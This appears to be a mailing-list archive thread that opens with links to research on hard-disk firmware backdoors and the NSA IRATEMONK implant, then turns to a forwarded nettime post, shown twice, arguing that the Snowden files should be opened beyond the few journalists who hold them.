Disk Firmware Data Exfiltration Backdoor / NSA IRATEMONK
http://s3.eurecom.fr/docs/acsac13_zaddach.pdf http://s3.eurecom.fr/~zaddach/docs/Recon14_HDD.pdf http://s3.eurecom.fr/publications.html Always interesting when public, and presumably secret, research are lined up beside each other (recon slides).
(fwd. from the nettime mailinglist /geert) from: Krystian Woznicki <kw@berlinergazette.de> the snowden files are of public interest. but only a small circle of people is able to access, read, analyze, interpret and publish them. and only a very small percentage of those files has been made available to the public. those who belong to the small circle of people, tend to argue that this has to do with security reasons. so one could say, that the leaked files have been "secured" in order to prevent bigger harm. yet, in the very sense that "data is the oil of the 21 century" one can also say, that the snowden files have been privatised by people who try to exploit them according to their own interests. what can be done about this situation? are we able to find a way to "open" this data? and in the course of this create a modell for future leaks? many researchers, activistis and technology experts (not to speak of other journalists than the "few luckey ones") have a great interest to work with those files. imagine the historical impact on sciences, social movements and it-infrastructures, if those files would serve as material to study and learn from in the respective areas. the snowden story has been a great, exceptional media narrative -- if only for its unusual duration (unfolding over the course of more than a year and stimulating a variety of debates). but the fact, that material, that one brave whistleblower considered to be worth of public interest, has been "secured" or "privatised", rendering again unaccessible what previously has been unaccessible -- doesn't this fact add a very unsettling layer to the narrative, turning the success story into somewhat of a tragedy? yesterday at the netzwerk recherche conference in hamburg (the great gathering of the investigative community) i confronted luke harding (http://en.wikipedia.org/wiki/Luke_Harding) with this question. prior to my intervention harding had already hinted at some very obvious limitations of the ongoing investigation, alluding to various reasons why those "few lucky ones" are incapable to deal with the investigation challenge in an approriate manner: "we are not technical experts" or "after two hours your eyes pop out". inspite of this, harding seemed unprepared to refelect the possibility to open the small circle of analysts dealing with the snowden files. to paraphrasie his response: yes, it is a dilemma, that only few people can look at the snowden files and draw their own conclusions. however this limitation is a natural result of their very precarious nature (files containing state secrets) and a consequence of the massive pressure by the government. nonetheless, 'if you have a special project' you could contact alan rusbridger and probably get him to provide you with the requested material... a request for files -- such a request is usually directed towards somewhat obscure organistions and corporations and it is usually articulated by the press (deploying the freedom of information law or other legal instruments); such a request is usually denied at first. and as the histrory of investigative journalism shows: one must fight for one's right to access for information including going to court. such a request for files is an important, if not the most important, instrument *for the press*. but now it is the press itself (respectively some of its representatives) towards which such a request needs to be articulated. this is absurd and prompts many questions, including: to whom are organisations like the guardian accountable? a couple of things one could do about it: * such requests may seem futile, but they are an instrument and as the experience shows, one can win the fight. * one can consider to complain at e.g. the press complaints commission with regard to media corporations exercising exclusive control over the files -- in germany for example this sort of (quasi-monopolistic) control violates the so called presserat-kodex. * last but not least: one should work out a concept/model for transferring those files into the public domain -- taking also into account the obvious problems of "security" and "government pressure". it would be great of we could start a debate about in order to build a case for the future of handling big data leaks in a more democratic and sustainable manner. i will also write a german version of this post for berlinergazette.de and i am more than happy to include some of your responses into that version. best wishes, krystian # distributed via <nettime>: no commercial use without permission # <nettime> is a moderated mailing list for net criticism, # collaborative text filtering and cultural politics of the nets # more info: http://mx.kein.org/mailman/listinfo/nettime-l # archive: http://www.nettime.org contact: nettime@kein.org
This comes to mind: https://twitter.com/Cryptomeorg/status/485504337968246784 (Your e-mail was featured on Cryptome twitter) See also: https://twitter.com/Cryptomeorg/status/483353469789556739 Supposedly Cryptome will do a July dump, but not clear as to what exactly is to be released.
(fwd. from the nettime mailinglist /geert)
from: Krystian Woznicki <kw@berlinergazette.de>
the snowden files are of public interest. but only a small circle of people is able to access, read, analyze, interpret and publish them. and only a very small percentage of those files has been made available to the public.
those who belong to the small circle of people, tend to argue that this has to do with security reasons. so one could say, that the leaked files have been "secured" in order to prevent bigger harm. yet, in the very sense that "data is the oil of the 21 century" one can also say, that the snowden files have been privatised by people who try to exploit them according to their own interests.
what can be done about this situation? are we able to find a way to "open" this data? and in the course of this create a modell for future leaks?
many researchers, activistis and technology experts (not to speak of other journalists than the "few luckey ones") have a great interest to work with those files. imagine the historical impact on sciences, social movements and it-infrastructures, if those files would serve as material to study and learn from in the respective areas.
the snowden story has been a great, exceptional media narrative -- if only for its unusual duration (unfolding over the course of more than a year and stimulating a variety of debates). but the fact, that material, that one brave whistleblower considered to be worth of public interest, has been "secured" or "privatised", rendering again unaccessible what previously has been unaccessible -- doesn't this fact add a very unsettling layer to the narrative, turning the success story into somewhat of a tragedy?
yesterday at the netzwerk recherche conference in hamburg (the great gathering of the investigative community) i confronted luke harding (http://en.wikipedia.org/wiki/Luke_Harding) with this question.
prior to my intervention harding had already hinted at some very obvious limitations of the ongoing investigation, alluding to various reasons why those "few lucky ones" are incapable to deal with the investigation challenge in an approriate manner: "we are not technical experts" or "after two hours your eyes pop out". inspite of this, harding seemed unprepared to refelect the possibility to open the small circle of analysts dealing with the snowden files.
to paraphrasie his response: yes, it is a dilemma, that only few people can look at the snowden files and draw their own conclusions. however this limitation is a natural result of their very precarious nature (files containing state secrets) and a consequence of the massive pressure by the government. nonetheless, 'if you have a special project' you could contact alan rusbridger and probably get him to provide you with the requested material...
a request for files -- such a request is usually directed towards somewhat obscure organistions and corporations and it is usually articulated by the press (deploying the freedom of information law or other legal instruments); such a request is usually denied at first. and as the histrory of investigative journalism shows: one must fight for one's right to access for information including going to court.
such a request for files is an important, if not the most important, instrument *for the press*. but now it is the press itself (respectively some of its representatives) towards which such a request needs to be articulated. this is absurd and prompts many questions, including:
to whom are organisations like the guardian accountable?
a couple of things one could do about it:
* such requests may seem futile, but they are an instrument and as the experience shows, one can win the fight.
* one can consider to complain at e.g. the press complaints commission with regard to media corporations exercising exclusive control over the files -- in germany for example this sort of (quasi-monopolistic) control violates the so called presserat-kodex.
* last but not least: one should work out a concept/model for transferring those files into the public domain -- taking also into account the obvious problems of "security" and "government pressure".
it would be great of we could start a debate about in order to build a case for the future of handling big data leaks in a more democratic and sustainable manner.
i will also write a german version of this post for berlinergazette.de and i am more than happy to include some of your responses into that version.
best wishes,
krystian
# distributed via <nettime>: no commercial use without permission # <nettime> is a moderated mailing list for net criticism, # collaborative text filtering and cultural politics of the nets # more info: http://mx.kein.org/mailman/listinfo/nettime-l # archive: http://www.nettime.org contact: nettime@kein.org
participants (3)
-
Geert Lovink
-
grarpamp
-
Odinn Cyberguerrilla